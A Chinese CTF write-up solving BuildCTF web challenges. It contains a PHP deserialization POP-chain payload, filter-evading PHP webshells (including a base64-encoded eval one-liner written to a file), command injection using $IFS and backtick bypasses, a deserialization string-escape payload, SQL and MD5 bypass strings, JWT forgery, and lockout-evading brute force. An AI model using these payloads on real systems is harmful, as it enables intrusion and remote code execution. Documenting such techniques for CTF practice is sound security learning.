BuildCTFweb部门题解
Cookie_Factory扫扫目录
https://i-blog.csdnimg.cn/direct/3d73474d61be4c2fa3243a6b716c8808.png
在app.js文件中发现了一个有意思的东西
https://i-blog.csdnimg.cn/direct/a651a790769145398e499511f53e0774.png
LovePopChain
打开环境发现给了一串php源码,拷贝到本地进行分析。
发现@unserialize,又找到__wakeup(),尝试构造序列化。
分析其链,@unserialize优先触发__wakeup(),而入口是__clone()中的eval()
执行__clone()需要Myobject对象中的__invoke(),
__invoke() // 当尝试以调用函数的方式调用一个对象时,该方法会被主动调用。
发现hybcx对象中的__toString()魔术方法中的$this->Si最有大概。而MyObject中的Nolove="Do_You_Want_Fl4g?"可以触发该方法。
分析完开始尝试构造序列化。
$a=new MyObject();
$b=new hybcx();
$b ->Si = $a;
$a ->NoLove = $b;
echo serialize($a);
$a = new MyObject();
$b = new hybcx();
$b->Si=$a;
$a->NoLove = $b;
echo serialize($a);
大概就是如许。运行后得到
O:8:"MyObject":2:{s:6:"NoLove";O:5:"hybcx":2:{s:6:"JiuYue";N;s:2:"Si";r:1;}s:6:"Forgzy";N;}
参数中的.会被过滤掉,只要将_换成[后,[会被转义成_,而背面的就会被忽略
Post传入参数
https://i-blog.csdnimg.cn/direct/03825f6d7cd14df88f37022b9b247dac.png
发现了flag
https://i-blog.csdnimg.cn/direct/d550b80b977f4f2eb4c9b2d109fbf8c7.png
RedFlag
这里建议去看BUUCTF SSTI模板注入 - 高人于斯 - 博客园这里的文章,有原题
babyupload
进行目录扫描
https://i-blog.csdnimg.cn/direct/28ee622daaa445b0bc95515533c060a6.png
获得上传路径
尝试上传图片马,提示马没了,多次尝试,发现对eval,system,passthru,assert进行了过滤,尝试进行构造绕过
??_x0010_JFIF
<?=$a='sys';$b='tem';$funcName=$a.$b;$x='funcName';$$x($_REQUEST);?>
获得路径
尝试上传.htacces,发现克制上传,尝试绕过,使用111.htacces.jpg上传,抓包,修改后乐成
https://i-blog.csdnimg.cn/direct/45c00b4c10124ea38c42a862b92f58bf.png
尝试访问
https://i-blog.csdnimg.cn/direct/96b757eb9e3742629ea46c26919264c8.png
尝试使用base64输入
echo "PD89ZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTs/Pg=="|base64 -d>222.php(一句话木马)
https://i-blog.csdnimg.cn/direct/2d44aa299dcc41729df6c3ca42c6efc1.png
flag藏在环境变量中,打开终端输入env,获得flag
我写的网站被rce了?
每个按钮测试一次,发现更新软件,备份日记,检察日记,检察历程功能开发完成,其他都体现功能正在开发
对其挨个抓包检察,测试
更新软件:日记备份,参数测试相应大小相同
https://i-blog.csdnimg.cn/direct/5d100857113d4551b9a70757613670a7.png
https://i-blog.csdnimg.cn/direct/12769fc599bb4ef2a4f77c9aa535c3e7.png
测试日记检察时,相应长度发生差别,检察,发现报错信息,尝试在此处进行rce
https://i-blog.csdnimg.cn/direct/5c23ea626c564d0e83941c8fad1f9e4d.png
此时尝试参数1,发现数字被过滤,体现hacker,尝试xxx,发现报错,但是ls和.log拼接了,所以ls后也||隔开
https://i-blog.csdnimg.cn/direct/762555afa5ab4771b1b3c3aa5e1f572f.png
乐成ls
https://i-blog.csdnimg.cn/direct/67473df48e3c408eb1e1714f7e76ee45.png
尝试判定过滤字符
https://i-blog.csdnimg.cn/direct/d4716b718b7c4303b1781c6926ed1ebc.png
空格过滤,使用$IFS绕过
https://i-blog.csdnimg.cn/direct/47adcf5e6de24c82b311a6d1c14b4a44.png
Cat过滤,加’数字’过滤,换成字母正常
https://i-blog.csdnimg.cn/direct/33d2f4938f6f4704b7a4405757323977.png
Flag过滤,``继续绕过,/目录下发现flag
https://i-blog.csdnimg.cn/direct/d6c8f648f5d54ed2be5333bd0cb53ced.png
find-the-id
输入1,用yakit进行抓包,对参数进行fuzz,发现有一个相应大小与其他差别,检察,发现flag
https://i-blog.csdnimg.cn/direct/28fcc5bdc69f4ea3a833fa79f92081d8.png
https://i-blog.csdnimg.cn/direct/c2b6e45060ba4d8d8bf6f54dc5d1e1e3.png
https://i-blog.csdnimg.cn/direct/afcfbe0f2c6c4077aea9f5e4995c88fe.png
tflock
扫目录
发现robots.txt
https://i-blog.csdnimg.cn/direct/8e3948e4f6cd4041917745f6fcfc35ef.png
https://i-blog.csdnimg.cn/direct/0b2611a27b484e0488c5e806dde93cd0.png
获得密码本,然后从ctferpass里登录进去获得了一个登录后的路径
然后就是抓包测试,但是鉴于之前先输入username,再输入password会爆锁
所以就先爆破密码,互换其位置,开始爆破
乐成出现flag
https://i-blog.csdnimg.cn/direct/5ae2b7ee2bdc46a586db628c03715951.png
ps:假如不可的话,就把login.php变为login.php/admin.php
纯净环境下进行爆破,假如账户已经锁定,爆破的时候还是锁定的!!!!!!!(留意)
刮刮乐
进去啥都没有,检查提示传参cmd
https://i-blog.csdnimg.cn/direct/4fd9a2a92f2640b59c267604951e8119.png
传入参数cmd后,发现在页面最下方提示我不是百度本身人
但是页面看着太不舒服了,果断禁用js
https://i-blog.csdnimg.cn/direct/cb111e1b535a401a84572d5f38890044.png
添加referer和xff后,居然没有页面提示了
直接尝试
https://i-blog.csdnimg.cn/direct/a74a3a4cc8ea46e9b0966c9056f6efe4.png
Why_so_serials?
给了一串php代码,拷下来看看
发现反序列化
https://i-blog.csdnimg.cn/direct/52d6b56ab42b4912b458bcce07609ceb.png
发现字符替换
https://i-blog.csdnimg.cn/direct/439f0a966ca34208a7774af2c86dfe56.png
考虑反序列化字符逃逸
分析代码发现,触发flag体现需要crime的值为真,将代码中crime的值改为true,执行反序列化操作,得到要逃逸的字符串
https://i-blog.csdnimg.cn/direct/8c027b804bae4261bc10ad87d2d49399.png
“;s:5:"crime";b:1;} 共记19个字符,
然后joker替换batman后会溢出一个字符,也就是说末了构造的时候需要19个joker
检察GET传参Bruce,发现没有对此做要求,随便传一个值,末了payload
?Bruce=1&Wayne=jokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjoker";s:5:"crime";b:1;}
获得flag
https://i-blog.csdnimg.cn/direct/26fcb1b390c146fb9df3ec88e6ebf918.png
eazyl0gin
给了个登录框提示
https://i-blog.csdnimg.cn/direct/1ea4da33a7a04b22b10ce321893ab2c6.png
下载附件,检察js文件
https://i-blog.csdnimg.cn/direct/27cf6b9d9ba04a78a164a9ef10b800f5.png
先去解密下密码
https://i-blog.csdnimg.cn/direct/9e65c50cf1ca4f0aa513df9dda6dfc67.png
然后就对账号进行研究,因为提到了UpperCase(),去看看这是什么东西
瞥见是Nodejs,点进去看看
https://i-blog.csdnimg.cn/direct/da88e3fd46914784a3001a9257ab336b.png
https://i-blog.csdnimg.cn/direct/4f4b7d4b20594dcda2901701eccaa169.png
尝试使用buıldctf/012346登陆,发现flag
ez_md5
https://i-blog.csdnimg.cn/direct/d597b0aa6a5f4c8d83d36fd24d0cdcf6.png
瞥见这个输入框,直接尝试了万能密码ffifdyop,直接就乐成了
https://i-blog.csdnimg.cn/direct/3fb8c0c4d1db4e6482e1e33416218a82.png
一开始只瞥见了下面这个,传了两个相等md5的数字进去,但是居然还体现不可以
https://i-blog.csdnimg.cn/direct/470a6ab15e89469394900b0fb9c586b8.png
后来突然瞥见这个Request,想到request会和cookie有关,尝试修改cookie的值为1
https://i-blog.csdnimg.cn/direct/e85fcd4a0a41407bb33b809ebdf6a85a.png
果然这里就绕过了
https://i-blog.csdnimg.cn/direct/30c0fd1de7c2479eb53ef377dc7aa6f3.png
这里的post传参,之间拿到网站去解密了
https://i-blog.csdnimg.cn/direct/a63f4da41977475ea653a6c5f613529f.png
https://i-blog.csdnimg.cn/direct/5985d8474eaf46e284f7fad036d1704c.png
传入这个,居然还让我再想想,明明都传完了啊啊啊!!!
瞥见_了,这不就又是谁人可恶的瞥见.主动换成_吗,直接[绕过。
哈哈哈获得flag
https://i-blog.csdnimg.cn/direct/4a7d200abefc4783b88971e2cd5965d4.png
等我写wp的时候发现了
https://i-blog.csdnimg.cn/direct/0849b4a50ac840a3825ed7433a533bb3.png
https://i-blog.csdnimg.cn/direct/91b769d5bc734a37a5d3f3684371497c.png
ez_waf
上传文件,发现过滤很严格
https://i-blog.csdnimg.cn/direct/49d02d11fc7a4084bb2f2d068b08f3a2.png
但是允许上传php文件
https://i-blog.csdnimg.cn/direct/bee056ae5f924d0db98d5d1d6fea890c.png
进行fuzz,看过滤哪些关键词
https://i-blog.csdnimg.cn/direct/b2c9c7ff3d8f4ceeb12bc9604fc895b7.png
发现<> eval system,字符加等号等都被过滤,看来进行绕过是基本不大概了
考虑扔一堆垃圾数据进行溢出
https://i-blog.csdnimg.cn/direct/c2898bbfad0a417bbe84ed960eaa32a7.png
获得flag
https://i-blog.csdnimg.cn/direct/1201df30a684453d9663557fe8b645ff.png
sub
先检察源码,发现和jwt有关,给了密钥
https://i-blog.csdnimg.cn/direct/0f26d1541ab84a66b207d32960830756.png
一些关键信息
https://i-blog.csdnimg.cn/direct/6a969c56b53e4cbc8dad1b354cb8cabd.png
这里要求用户是admin
https://i-blog.csdnimg.cn/direct/18a192db8f074ed3bc90d7cc5f43e047.png
起首注册用户admin,然后根据login的关键信息进行jwt 伪造
https://i-blog.csdnimg.cn/direct/7af88392505843d5b95aae5cccd3b2b9.png
这里一开始时间戳我复制了当前时间的时间戳,在检察页面的时候爆了Token has expired
回去检察源码发现要30分钟后,直接伪造了个久远的时间
https://i-blog.csdnimg.cn/direct/4842e485b0af4b6791d9f720cf86d9e1.png
抓包page页面,把Cookie伪造
乐成访问
https://i-blog.csdnimg.cn/direct/568d796e217b479fb858b306e8c8fbef.png
进行使用
https://i-blog.csdnimg.cn/direct/87b1dcafe4de4cacb2eca82a57bb628b.png
隔断
https://i-blog.csdnimg.cn/direct/de6d86db4c4346c0a407cc73d4409a28.png
https://i-blog.csdnimg.cn/direct/cae3d454b0a14df2849e2a6c843fd3ea.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]